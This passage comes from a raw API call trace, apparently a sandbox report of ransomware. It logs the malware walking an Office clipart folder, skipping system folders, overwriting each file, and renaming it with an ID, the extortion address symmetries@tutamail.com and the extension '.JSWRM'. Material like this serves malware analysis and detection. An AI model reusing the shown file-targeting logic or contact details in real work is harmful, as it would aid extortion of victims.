lpDistanceToMoveHigh=0x0) returned 0x0 [0074.287] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1e70) returned 0x24c1d0 [0074.287] ReadFile (in: hFile=0x460, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x1e70, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x1e70, lpOverlapped=0x0) returned 1 [0074.289] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.289] WriteFile (in: hFile=0x460, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x1e70, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x1e70, lpOverlapped=0x0) returned 1 [0074.289] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0074.289] CloseHandle (hObject=0x460) returned 1 [0074.289] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0074.289] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0074.289] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0074.290] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0074.290] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0074.290] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0074.290] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0074.290] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a420 [0074.290] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a420, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0074.290] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a420 | out: hHeap=0x1e0000) returned 1 [0074.290] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d290 [0074.290] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x248058 [0074.290] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d290 | out: hHeap=0x1e0000) returned 1 [0074.290] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0074.290] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04267_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04267_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04267_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04267_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0074.291] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x248058 | out: hHeap=0x1e0000) returned 1 [0074.291] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0074.291] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0074.291] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcc63b1c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcc63b1c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xccaffc4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x7e0, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="AN04269_.WMF", cAlternateFileName="")) returned 1 [0074.292] lstrcmpiW (lpString1="AN04269_.WMF", lpString2=".") returned 1 [0074.292] lstrcmpiW (lpString1="AN04269_.WMF", lpString2="..") returned 1 [0074.292] lstrcmpiW (lpString1="AN04269_.WMF", lpString2="...") returned 1 [0074.292] lstrcmpiW (lpString1="AN04269_.WMF", lpString2="windows") returned -1 [0074.292] lstrcmpiW (lpString1="AN04269_.WMF", lpString2="recovery") returned -1 [0074.292] lstrcmpiW (lpString1="AN04269_.WMF", lpString2="perflogs") returned -1 [0074.292] lstrcmpiW (lpString1="AN04269_.WMF", lpString2="documents and settings") returned -1 [0074.292] lstrcmpiW (lpString1="AN04269_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0074.292] lstrcmpiW (lpString1="AN04269_.WMF", lpString2="system volume information") returned -1 [0074.292] lstrcmpiW (lpString1="AN04269_.WMF", lpString2="msocache") returned -1 [0074.292] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0074.292] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AN04269_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0074.292] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AN04269_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AN04269_.WMF", lpUsedDefaultChar=0x0) returned 12 [0074.292] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0074.292] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0074.292] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AN04269_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0074.292] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AN04269_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AN04269_.WMF", lpUsedDefaultChar=0x0) returned 12 [0074.292] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0074.292] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0074.292] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0074.293] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0074.293] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0074.293] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0074.293] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04269_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04269_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0074.293] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2016) returned 1 [0074.293] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.293] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x7e0) returned 0x23fc98 [0074.293] ReadFile (in: hFile=0x460, lpBuffer=0x23fc98, nNumberOfBytesToRead=0x7e0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesRead=0x345e89c*=0x7e0, lpOverlapped=0x0) returned 1 [0074.296] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.296] WriteFile (in: hFile=0x460, lpBuffer=0x23fc98*, nNumberOfBytesToWrite=0x7e0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesWritten=0x345e898*=0x7e0, lpOverlapped=0x0) returned 1 [0074.296] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fc98 | out: hHeap=0x1e0000) returned 1 [0074.296] CloseHandle (hObject=0x460) returned 1 [0074.296] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0074.296] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0074.296] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0074.296] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0074.296] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0074.296] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0074.296] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0074.296] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a450 [0074.296] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a450, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0074.297] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a450 | out: hHeap=0x1e0000) returned 1 [0074.297] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23db18 [0074.297] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247e68 [0074.297] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23db18 | out: hHeap=0x1e0000) returned 1 [0074.297] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0074.297] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04269_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04269_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04269_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04269_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0074.297] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247e68 | out: hHeap=0x1e0000) returned 1 [0074.298] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0074.298] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0074.298] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xccaffc4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xccaffc4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xccaffc4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x9bc, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="AN04323_.WMF", cAlternateFileName="")) returned 1 [0074.298] lstrcmpiW (lpString1="AN04323_.WMF", lpString2=".") returned 1 [0074.298] lstrcmpiW (lpString1="AN04323_.WMF", lpString2="..") returned 1 [0074.298] lstrcmpiW (lpString1="AN04323_.WMF", lpString2="...") returned 1 [0074.298] lstrcmpiW (lpString1="AN04323_.WMF", lpString2="windows") returned -1 [0074.298] lstrcmpiW (lpString1="AN04323_.WMF", lpString2="recovery") returned -1 [0074.298] lstrcmpiW (lpString1="AN04323_.WMF", lpString2="perflogs") returned -1 [0074.298] lstrcmpiW (lpString1="AN04323_.WMF", lpString2="documents and settings") returned -1 [0074.298] lstrcmpiW (lpString1="AN04323_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0074.298] lstrcmpiW (lpString1="AN04323_.WMF", lpString2="system volume information") returned -1 [0074.298] lstrcmpiW (lpString1="AN04323_.WMF", lpString2="msocache") returned -1 [0074.298] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0074.298] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AN04323_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0074.298] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AN04323_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AN04323_.WMF", lpUsedDefaultChar=0x0) returned 12 [0074.298] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0074.298] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0074.298] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AN04323_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0074.298] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AN04323_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AN04323_.WMF", lpUsedDefaultChar=0x0) returned 12 [0074.298] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0074.298] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0074.298] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0074.298] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0074.298] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0074.298] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0074.298] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04323_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04323_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0074.299] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2492) returned 1 [0074.299] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.299] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x9b0) returned 0x23fc98 [0074.299] ReadFile (in: hFile=0x460, lpBuffer=0x23fc98, nNumberOfBytesToRead=0x9b0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesRead=0x345e89c*=0x9b0, lpOverlapped=0x0) returned 1 [0074.300] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.300] WriteFile (in: hFile=0x460, lpBuffer=0x23fc98*, nNumberOfBytesToWrite=0x9b0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesWritten=0x345e898*=0x9b0, lpOverlapped=0x0) returned 1 [0074.300] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fc98 | out: hHeap=0x1e0000) returned 1 [0074.300] CloseHandle (hObject=0x460) returned 1 [0074.300] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0074.300] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0074.300] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0074.300] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0074.300] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0074.300] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0074.300] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0074.300] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a348 [0074.301] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a348, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0074.301] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a348 | out: hHeap=0x1e0000) returned 1 [0074.301] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cdf8 [0074.301] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2472c8 [0074.301] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cdf8 | out: hHeap=0x1e0000) returned 1 [0074.301] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0074.301] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04323_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04323_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04323_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04323_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0074.301] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2472c8 | out: hHeap=0x1e0000) returned 1 [0074.301] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0074.301] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0074.301] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcc89dc9, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcc89dc9, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xccaffc4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xd14, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="AN04326_.WMF", cAlternateFileName="")) returned 1 [0074.301] lstrcmpiW (lpString1="AN04326_.WMF", lpString2=".") returned 1 [0074.301] lstrcmpiW (lpString1="AN04326_.WMF", lpString2="..") returned 1 [0074.301] lstrcmpiW (lpString1="AN04326_.WMF", lpString2="...") returned 1 [0074.301] lstrcmpiW (lpString1="AN04326_.WMF", lpString2="windows") returned -1 [0074.301] lstrcmpiW (lpString1="AN04326_.WMF", lpString2="recovery") returned -1 [0074.302] lstrcmpiW (lpString1="AN04326_.WMF", lpString2="perflogs") returned -1 [0074.302] lstrcmpiW (lpString1="AN04326_.WMF", lpString2="documents and settings") returned -1 [0074.302] lstrcmpiW (lpString1="AN04326_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0074.302] lstrcmpiW (lpString1="AN04326_.WMF", lpString2="system volume information") returned -1 [0074.302] lstrcmpiW (lpString1="AN04326_.WMF", lpString2="msocache") returned -1 [0074.302] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0074.302] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AN04326_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0074.302] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AN04326_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AN04326_.WMF", lpUsedDefaultChar=0x0) returned 12 [0074.302] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0074.302] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0074.302] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AN04326_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0074.302] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AN04326_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AN04326_.WMF", lpUsedDefaultChar=0x0) returned 12 [0074.302] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0074.302] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0074.302] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0074.302] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0074.302] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0074.302] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0074.302] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04326_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04326_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0074.302] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3348) returned 1 [0074.302] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.302] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd10) returned 0x24c1d0 [0074.302] ReadFile (in: hFile=0x460, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0xd10, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0xd10, lpOverlapped=0x0) returned 1 [0074.304] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.304] WriteFile (in: hFile=0x460, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0xd10, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0xd10, lpOverlapped=0x0) returned 1 [0074.304] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0074.304] CloseHandle (hObject=0x460) returned 1 [0074.304] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0074.304] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0074.304] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0074.304] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0074.304] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0074.304] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0074.304] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0074.304] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, 